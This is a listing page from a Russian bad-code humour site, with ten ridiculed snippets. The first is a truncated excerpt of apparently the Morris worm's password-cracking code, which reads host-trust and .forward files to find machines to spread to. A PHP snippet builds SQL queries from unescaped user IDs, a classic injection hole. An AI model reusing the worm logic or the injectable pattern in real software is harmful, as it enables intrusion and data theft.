1. Лучший говнокод

    В номинации:
    За время:
  2. C++ / Говнокод #9961

    +992

    1. 001
    2. 002
    3. 003
    4. 004
    5. 005
    6. 006
    7. 007
    8. 008
    9. 009
    10. 010
    11. 011
    12. 012
    13. 013
    14. 014
    15. 015
    16. 016
    17. 017
    18. 018
    19. 019
    20. 020
    21. 021
    22. 022
    23. 023
    24. 024
    25. 025
    26. 026
    27. 027
    28. 028
    29. 029
    30. 030
    31. 031
    32. 032
    33. 033
    34. 034
    35. 035
    36. 036
    37. 037
    38. 038
    39. 039
    40. 040
    41. 041
    42. 042
    43. 043
    44. 044
    45. 045
    46. 046
    47. 047
    48. 048
    49. 049
    50. 050
    51. 051
    52. 052
    53. 053
    54. 054
    55. 055
    56. 056
    57. 057
    58. 058
    59. 059
    60. 060
    61. 061
    62. 062
    63. 063
    64. 064
    65. 065
    66. 066
    67. 067
    68. 068
    69. 069
    70. 070
    71. 071
    72. 072
    73. 073
    74. 074
    75. 075
    76. 076
    77. 077
    78. 078
    79. 079
    80. 080
    81. 081
    82. 082
    83. 083
    84. 084
    85. 085
    86. 086
    87. 087
    88. 088
    89. 089
    90. 090
    91. 091
    92. 092
    93. 093
    94. 094
    95. 095
    96. 096
    97. 097
    98. 098
    99. 099
    100. 100
    /* Dover */
    
    #include "worm.h"
    #include <stdio.h>
    #include <ctype.h>
    #include <strings.h>
    #include <pwd.h>
    
    int cmode;
    extern struct hst *h_name2host();
    
    struct usr {					/* sizeof(usr) == 58 */
        char *name, *o4, *o8, *o12;
        char passwd[14];				/* offset 16 */
        char decoded_passwd[14];			/* 30 */
        short pad;
        char *homedir;				/* offset 46 */
        char *gecos;				/* offset 50 */
        struct usr *next;				/* offset 54 */
    };
    
    /* Ahhh, I just love these names.  Don't change them for anything. */
    static struct usr *x27f28, *x27f2c;
    
    /* Crack some passwords. */
    cracksome()
    {
        switch (cmode){
        case 0:
    	strat_0();
    	return;					/* 88 */
        case 1:
    	strat_1();
    	return;
        case 2:
    	try_words();
    	return;
        case 3:
    	dict_words();
    	return;
        }
    }
    
    /* Strategy 0, look through /etc/hosts.equiv, and /.rhost for new hosts */
    strat_0()					/* 0x5da4 */
    {
        FILE *hosteq;
        char scanbuf[512];
        char fwd_buf[256];
        char *fwd_host;
        char getbuf[256];
        struct passwd *pwent;
        char local[20];
        struct usr *user;
        struct hst *host;				/* 1048 */
        int check_other_cnt;			/* 1052 */
        static struct usr *user_list = NULL;
    
        hosteq = fopen(XS("/etc/hosts.equiv"), XS("r"));
        if (hosteq != NULL) {			/* 292 */
    	while (fscanf(hosteq, XS("%.100s"), scanbuf)) {
    	    host = h_name2host(scanbuf, 0);
    	    if (host == 0) {
    		host = h_name2host(scanbuf, 1);
    		getaddrs(host);
    	    }
    	    if (host->o48[0] == 0)		/* 158 */
    		continue;
    	    host->flag |= 8;
    	}
    	fclose(hosteq);				/* 280 */
        }
    
        hosteq = fopen(XS("/.rhosts"), XS("r"));
        if (hosteq != NULL) {			/* 516 */
    	while (fgets(getbuf, sizeof(getbuf), hosteq)) { /* 344,504 */
    	    if (sscanf(getbuf, XS("%s"), scanbuf) != 1)
    		continue;
    	    host = h_name2host(scanbuf, 0);
    	    while (host == 0) {			/* 436, 474 */
    		host = h_name2host(scanbuf, 1);
    		getaddrs(host);
    	    }
    	    if (host->o48[0] == 0)
    		continue;
    	    host->flag |= 8;
    	}
    	fclose(hosteq);
        }
    
        /* look through the passwd file, checking for contact with others every
         * tenth entry. */
        setpwent();
        check_other_cnt = 0;					/* 522 */
        while ((pwent = getpwent()) != 0) {		/* 526, 1124 */
    	if ((check_other_cnt % 10) == 0)
    	    other_sleep(0);
    	check_other_cnt++;
    	sprintf(fwd_buf, XS("%.200s/.forward"), pwent->pw_dir);
    	hosteq = fopen(fwd_buf, XS("r"));...

    Govnisti_Diavol, 16 Апреля 2012

    Комментарии (8)
  3. C++ / Говнокод #9930

    +119

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    if(bCanPut)
    {
    	
    	m_RealTexts[nIndex].txtStartPt.x = ptStandard.x + (szStandard.cx-szTxtDC.cx)/2.0;
    	m_RealTexts[nIndex].txtStartPt.y = ptStandard.y + (szStandard.cy-szTxtDC.cy)/2.0;
    	m_RealTexts[nIndex].txtSize = szTxtDC;
    	m_RealTexts[nIndex].txtMovePt.x = 0.0 - (szStandard.cx-szTxtDC.cx)/2.0;
    	m_RealTexts[nIndex].txtMovePt.y = 0.0 - (szStandard.cy-szTxtDC.cy)/2.0;
    }
    else
    {
    	
    	m_RealTexts[nIndex].txtStartPt.x = ptStandard.x + (szStandard.cx-szTxtDC.cx)/2.0;
    	m_RealTexts[nIndex].txtStartPt.y = ptStandard.y + (szStandard.cy-szTxtDC.cy)/2.0;
    	m_RealTexts[nIndex].txtSize = szTxtDC;
    	m_RealTexts[nIndex].txtMovePt.x = 0.0 - (szStandard.cx-szTxtDC.cx)/2.0;
    	m_RealTexts[nIndex].txtMovePt.y = 0.0 - (szStandard.cy-szTxtDC.cy)/2.0;
    }

    someone, 12 Апреля 2012

    Комментарии (8)
  4. C# / Говнокод #9916

    +118

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    42. 42
    43. 43
    44. 44
    45. 45
    46. 46
    47. 47
    48. 48
    49. 49
    50. 50
    51. 51
    52. 52
    53. 53
    54. 54
    55. 55
    for (int Low = 0, Up = 8; (Low <= 72) & (Up <= 80); Low += 12, Up += 12)
                                    if ((i >= Low) & (i <= Up))
                                    {
                                        a = 0;
                                        for (int l = 0; l <= 13 * 3; l += 13)
                                        {
                                            if (labels[i + l].Text == "X")
                                            {
                                                a += 1;
                                                if ((l == 13 * 3) & (a != 4)) a = 0;
                                            }
                                            else a = 0;
                                        }
                                        if (a == 4)
                                        {
                                            if ((i != 8) & (i != 72))
                                            {
                                                if ((i == Low) | ((i >= 0) & (i <= 7)))
                                                    if (labels[i + 13 * 4].Text == "-")
                                                    {
                                                        labels[i + 13 * 4].Text = "O";
                                                        win = true;
                                                        goto End2;
                                                    }
                                                if ((i == Up) | ((i >= 73) & (i <= 80)))
                                                    if (labels[i - 13].Text == "-")
                                                    {
                                                        labels[i - 13].Text = "O";
                                                        win = true;
                                                        goto End2;
                                                    }
                                                if (i == Low)
                                                    if (labels[i + 13 * 4].Text == "-")
                                                    {
                                                        labels[i + 13 * 4].Text = "O";
                                                        win = true;
                                                        goto End2;
                                                    }
                                                if (i == Up)
                                                    if (labels[i - 13].Text == "-")
                                                    {
                                                        labels[i - 13].Text = "O";
                                                        win = true;
                                                        goto End2;
                                                    }
                                                if (((i >= 0) & (i <= 7)) | ((i >= 73) & (i <= 80)) | (i == Low) | (i == Up)) ;
                                                else
                                                {
                                                    if (labels[i + 13 * 4].Text == "O")
                                                        if (labels[i - 13].Text == "-")
                                                        {
                                                            labels[i - 13].Text = "O";
                                                            win = true;
                                                            goto End2;
                                                        }

    Полная версия: http://pastebin.com/gZFjYrtM

    P4R4, 10 Апреля 2012

    Комментарии (8)
  5. JavaScript / Говнокод #9901

    +155

    1. 1
    2. 2
    3. 3
    4. 4
    5. 5
    6. 6
    $(function() {
       ...
       $(document).ready(function() {
          ...
       }
    }

    somnambulism, 09 Апреля 2012

    Комментарии (8)
  6. Куча / Говнокод #9878

    +145

    1. 1
    http://don-shmat.narod2.ru/

    и тот кто это прислал предлагает заработать и показывает ссылку на ЭТО

    NeZeD, 06 Апреля 2012

    Комментарии (8)
  7. 1C / Говнокод #9858

    −129

    1. 1
    2. 2
    3. 3
    4. 4
    5. 5
    //если период поселения не соотв. порядку дат - забьем пустые клетки
    ~нах:	Если НачалоДня(выбГруппаПериод.периодГРуппа)>НачалоДня(ТекДатаШ) Тогда
    		ВывестиПустоеМесто(Выбмест.Место,ТекДатаШ);
    		Перейти ~нах;
    	КонецЕсли;

    Меток не видел со времён изучения ассемблера... Это ужас... Хотя переходят верно =)

    gavrick, 04 Апреля 2012

    Комментарии (8)
  8. C++ / Говнокод #9789

    +156

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    void checkDuplicateType(TWindowCasterToWindowAdditionalInformation GetWindowAdditionalInformation)
    	{
    		const TCasterRepository::const_iterator NotFound=_casterRepository.end();
    		const TCasterRepository::const_iterator Begin=_casterRepository.begin();
    		struct _
    		{
    			static bool TestDuplicateTypeAtThisItem(const TCasterRepository::value_type& Item, TWindowCasterToWindowAdditionalInformation GetWindowAdditionalInformationFunction)
    			{
    				return Item.second==GetWindowAdditionalInformationFunction;
    			}
    		};
    		ASSERT(std::find_if(Begin, NotFound, BOOST_BIND(_::TestDuplicateTypeAtThisItem, _1, GetWindowAdditionalInformationFunction))==NotFound);
    	}

    Большой проект.

    Говногость, 28 Марта 2012

    Комментарии (8)
  9. Java / Говнокод #9758

    +76

    1. 1
    2. 2
    3. 3
    4. 4
    5. 5
    6. 6
    7. 7
    // тут код FEST-теста
    try {
                applicationView.table("componentName");
                Assert.assertFalse(true);
    } catch (ComponentLookupException ignore) {
    }
    // тут дальше код FEST-теста

    Тест свалился по ассершену. Полез смотреть, что произошло, и нашел штук пять таких конструкций подряд. Руки опустились(

    kadavrrr, 25 Марта 2012

    Комментарии (8)
  10. PHP / Говнокод #9728

    +157

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    class UserAPI
    {
       function GetUserName($UserId)
       {
          $SqlQuery = mysql_query("SELECT UserName FROM users WHERE id='$UserId'");
          $Response = mysql_fetch_array($SqlQuery);
          return  $Response['UserName'];
       }
         
       function GetUserSurname($UserId)
       {
          $SqlQuery = mysql_query("SELECT UserSurname FROM users WHERE id='$UserId'");
          $Response = mysql_fetch_array($SqlQuery);
          return  $Response['UserSurname'];
       }
       
       function GetUserPhoto($UserId)
       {
          $SqlQuery = mysql_query("SELECT UserPhoto FROM users WHERE id='$UserId'");
          $Response = mysql_fetch_array($SqlQuery);
          return  $Response['UserPhoto'];
       }
       
       function GetUserCountry($UserId)
       {
          $SqlQuery = mysql_query("SELECT country FROM users WHERE id='$UserId'");
          $Response = mysql_fetch_array($SqlQuery);
          return  $Response['country'];
       }
    }

    О да!

    Govnisti_Diavol, 22 Марта 2012

    Комментарии (8)
  11. PHP / Говнокод #9685

    +150

    1. 1
    2. 2
    3. 3
    4. 4
    5. 5
    6. 6
    7. 7
    8. 8
    /**
     * Enter description here ...
     */
    function getStoresByZipcode($zipcode) {
      $stores = array();
    
      $range = 40;
      $R = 6371;  // earth's radius, km

    Wuron, 15 Марта 2012

    Комментарии (8)